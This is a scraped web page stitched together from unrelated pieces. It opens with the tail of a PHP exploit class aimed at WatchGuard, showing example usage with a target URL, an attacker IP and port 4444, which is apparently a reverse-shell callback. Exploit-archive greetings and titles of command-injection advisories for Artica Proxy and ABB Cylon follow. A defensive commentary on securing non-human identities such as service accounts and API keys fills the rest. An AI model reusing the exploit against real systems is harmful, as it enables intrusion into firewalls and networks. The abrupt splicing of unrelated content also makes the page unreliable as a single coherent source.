'Accept-Encoding: gzip, deflate',            'Content-Encoding: gzip'        ]);        echo "Payload sent.\n";    }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Artica Proxy 4.40 Code Injection

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php script.

ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

The future of cybersecurity will be shaped by how well we manage the explosion of NHIs.

Source: Brain light via Alamy Stock Photo

COMMENTARY

Imagine a vast and invisible army silently infiltrating your organization's digital defenses. No, this isn't the plot of a sci-fi thriller — it's the reality of non-human identities (NHIs) in today's cybersecurity landscape. As a seasoned security architect, I've watched this hidden force grow from a manageable contingent to a sprawling, often ungoverned multitude that's keeping chief information security officers (CISOs) awake at night. 

In my journey across startups and Fortune 500 companies, I've witnessed firsthand the mixed effects of NHIs. They keep our digital machinery running smoothly — but they are also a potential treasure trove for attackers looking to exploit our blind spots. It's time to shine a light on this invisible army and develop strategies to harness its power while mitigating its risks. 

**The Scale of the Problem**

Consider this: For every 1,000 human users in your organization, you likely have 10,000 non-human connections or credentials. Some estimates suggest the ratio could be as high as 45-to-1. These NHIs include service accounts, system accounts, API keys, tokens, and other forms of machine-based authentication that facilitate the complex web of interactions in our modern digital ecosystem. 

**Why NHIs Matter**

1.  Attack surface expansion: Each NHI represents a potential entry point for attackers. With their often-elevated privileges and lack of human oversight, compromised NHIs can be a goldmine for malicious actors. 
    
2.  Visibility challenges: Unlike human users, NHIs often operate in the background, created by developers or systems without proper governance. This lack of visibility makes them a significant blind spot for many security teams. 
    
3.  Privilege sprawl: Studies show that only 2% of permissions granted for NHIs are actually used. This massive overprovisioning of access rights creates an unnecessary risk landscape. 
    
4.  Third-party risk: NHIs often facilitate connections to external services and partners. When these third parties experience a breach, your organization's NHIs become a potential vector for lateral movement. 
    

**Real-World Implications**

The importance of securing NHIs is more than just theoretical. Recent high-profile incidents underscore their critical role in modern attacks. 

Nation-state actors have demonstrated proficiency in abusing OAuth applications to move laterally across cloud environments. At the same time, major software companies like Microsoft and Okta have fallen victim to attacks leveraging compromised machine identities. In a recent Securities and Exchange Commission (SEC) filing, even Dropbox disclosed a material incident involving a compromised service account. 

**Practical Steps for Mitigation**

1.  Discovery and inventory: You can't secure what you can't see. Implement tools and processes to continuously discover and catalog NHIs across all environments, including software-as-a-service (SaaS) applications. 
    
2.  Posture management: Go beyond simple inventory. Understand the permissions associated with each NHI, their usage patterns, and the potential risk they pose. 
    

**A Call to Action**

The explosion of NHIs represents both a challenge and an opportunity for the cybersecurity community. While the scale of the problem can seem daunting, we're ahead of the curve compared to where we were with human identity access management (IAM) decades ago. 

In my conversations with CISOs and security leaders, I've started to see a shift in mindset. There's a growing recognition that NHI security needs to be elevated to a top-tier priority, on par with traditional IAM and network security initiatives. 

As we move forward, I'm cautiously optimistic. The technology and practices to secure NHIs are evolving rapidly. We can turn the tide on this silent tsunami of risk with the right mix of visibility, automation, and a security-first culture. 

The future of cybersecurity will be shaped by how well we manage the explosion of non-human identities. As security professionals, it's our responsibility to lead the charge in this new frontier of identity security. Are you ready to meet the challenge? 

**About the Author**

Partner Solutions Architect

Vaibhav Malik has more than 14 years of experience in networking and security. He collaborates with global partners to create and deploy robust security solutions for enterprise clients. Malik is a recognized thought leader and expert in zero-trust security architecture. His previous roles at large service providers and security companies involved assisting Fortune 500 clients with network, security, and cloud transformation projects. He champions an identity and data-centric approach to security and is a popular speaker at industry events. With a master's in telecommunication from the University of Colorado Boulder and an MBA from the University of Illinois Urbana-Champaign, Malik's extensive expertise and hands-on experience make him an invaluable asset for organizations aiming to strengthen their cybersecurity posture in today's complex threat landscape.

Tag

#auth